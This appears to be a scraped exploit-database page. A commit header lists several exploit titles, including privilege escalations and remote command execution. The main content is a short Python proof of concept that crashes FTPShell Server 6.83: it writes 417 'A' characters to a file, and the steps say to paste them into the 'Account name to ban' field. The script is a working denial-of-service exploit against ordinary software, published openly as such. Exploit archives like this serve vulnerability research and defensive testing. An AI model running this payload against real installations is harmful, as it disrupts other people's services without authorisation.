
8 changes to exploits/shellcodes FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC) WinRAR 5.61 - '.lng' Denial of Service FaceTime - Texture Processing Memory Corruption Android Kernel < 4.8 - ptrace seccomp Filter Bypass MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation Apple macOS 10.13.5 - Local Privilege Escalation mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution Belkin Wemo UPnP - Remote Code Execution (Metasploit) HotelDruid 2.3 - Cross-Site Scripting
22 lines
No EOL
688 B
Python
Executable file
22 lines
No EOL
688 B
Python
Executable file
#Exploit Title: FTPShell Server 6.83 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2018-02-20
|
|
#Vendor Homepage: http://www.ftpshell.com/index.htm
|
|
#Software Link: http://www.ftpshell.com/downloadserver.htm
|
|
#Tested Version: 6.83
|
|
#Tested on: Windows 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: FTPShell_Server_6.83.py
|
|
#2.- Open ftpshell.txt and copy content to clipboard
|
|
#3.- Open FTPShell Server
|
|
#4.- Select "Manage FTP Accounts"
|
|
#5.- Select "Add Account Name" > in "Account name to ban" Paste Clipboard
|
|
#6.- Click on "Ok"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 417
|
|
|
|
f = open('ftpshell.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |